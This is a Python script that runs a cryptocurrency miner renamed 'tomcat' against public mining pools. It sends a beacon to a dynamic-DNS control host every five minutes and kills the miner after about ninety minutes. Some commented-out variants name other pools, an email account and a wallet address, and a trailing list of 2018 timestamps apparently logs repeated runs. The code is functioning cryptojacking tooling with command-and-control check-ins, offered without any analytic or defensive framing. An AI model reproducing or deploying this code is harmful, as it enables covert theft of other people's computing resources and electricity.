import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:01.783147
#2018-02-17 17:13:04.135667
#2018-02-17 19:01:01.450819
#2018-02-17 20:48:07.584733
#2018-02-17 22:35:07.856089
#2018-02-18 00:19:01.622797
#2018-02-18 02:10:03.505448
#2018-02-18 03:57:06.039497
#2018-02-18 05:46:07.349416
#2018-02-18 07:39:01.415026
#2018-02-18 09:26:01.827489
#2018-02-18 11:11:06.108988
#2018-02-18 12:58:05.776011
#2018-02-18 14:47:04.909084
#2018-02-18 16:36:05.957681
#2018-02-18 18:25:04.161458
#2018-02-18 20:12:04.179398
#2018-02-18 21:57:06.366522
#2018-02-18 23:46:05.989335
#2018-02-19 01:33:04.798699
#2018-02-19 03:21:07.073612
#2018-02-19 05:06:01.442758
#2018-02-19 06:51:06.260333
#2018-02-19 08:40:05.175188
#2018-02-19 10:28:07.667509
#2018-02-19 12:16:04.428714
#2018-02-19 14:05:04.388447
#2018-02-19 15:55:06.182717
#2018-02-19 17:43:02.069222
#2018-02-19 19:33:07.622671
#2018-02-19 21:23:05.991764
#2018-02-19 23:09:02.127783
#2018-02-20 00:53:01.471547
#2018-02-20 02:42:07.362179
#2018-02-20 04:31:01.619739
#2018-02-20 06:15:07.987893
#2018-02-20 08:00:06.679483
#2018-02-20 09:45:03.856380
#2018-02-20 11:29:08.096311
#2018-02-20 13:16:05.333260
#2018-02-20 15:01:07.735548
#2018-02-20 16:47:02.104043
#2018-02-20 18:34:01.908925
#2018-02-20 20:24:07.011465
#2018-02-20 22:11:05.806736
#2018-02-20 23:52:06.880669
#2018-02-21 01:39:07.261697
#2018-02-21 03:25:08.858863
#2018-02-21 05:13:04.353662
#2018-02-21 07:01:06.611336
#2018-02-21 08:47:05.402157
#2018-02-21 10:33:01.557935
#2018-02-21 12:21:06.441762
#2018-02-21 14:09:08.399763
#2018-02-21 15:57:05.928200
#2018-02-21 17:50:11.120694
#2018-02-21 19:37:09.290048
#2018-02-21 21:26:08.473272
#2018-02-21 23:13:07.870980
#2018-02-22 01:03:06.541120
#2018-02-22 02:54:05.347182
#2018-02-22 04:41:01.402798
#2018-02-22 06:26:07.900114
#2018-02-22 08:13:05.202865
#2018-02-22 10:02:04.656423
#2018-02-22 11:47:12.144908
#2018-02-22 13:35:11.084176
#2018-02-22 15:23:06.676721
#2018-02-22 17:08:01.356334
#2018-02-22 18:54:01.487670
#2018-02-22 20:48:02.227191
#2018-02-22 22:34:07.994046
#2018-02-23 00:19:04.285643
#2018-02-23 02:08:05.080484
#2018-02-23 03:57:07.018906
#2018-02-23 05:45:09.060985
#2018-02-23 07:35:06.195581
#2018-02-23 09:38:06.770159
#2018-02-23 11:42:04.236520
#2018-02-23 13:33:07.035400
#2018-02-23 15:19:01.836916
#2018-02-23 17:07:05.856983
#2018-02-23 18:36:02.007705
#2018-02-23 20:17:05.372217
#2018-02-23 21:49:05.735784
#2018-02-23 23:28:02.008974
#2018-02-24 01:04:02.215461
#2018-02-24 02:46:07.113120
#2018-02-24 04:22:01.513079
#2018-02-24 05:52:05.388872
#2018-02-24 07:27:07.139307
#2018-02-24 08:59:02.016175
#2018-02-24 10:49:01.977322
#2018-02-24 12:36:03.534354
#2018-02-24 14:24:04.236505
#2018-02-24 16:12:04.158467
#2018-02-24 18:04:06.904932
#2018-02-24 19:51:01.581043
#2018-02-24 21:36:06.889298
#2018-02-25 00:24:06.829463
#2018-02-25 03:30:08.983910
#2018-02-25 06:20:07.262913
#2018-02-25 11:34:01.787442
#2018-02-25 13:09:01.776703
#2018-02-25 14:42:01.612459
#2018-02-25 16:15:03.668579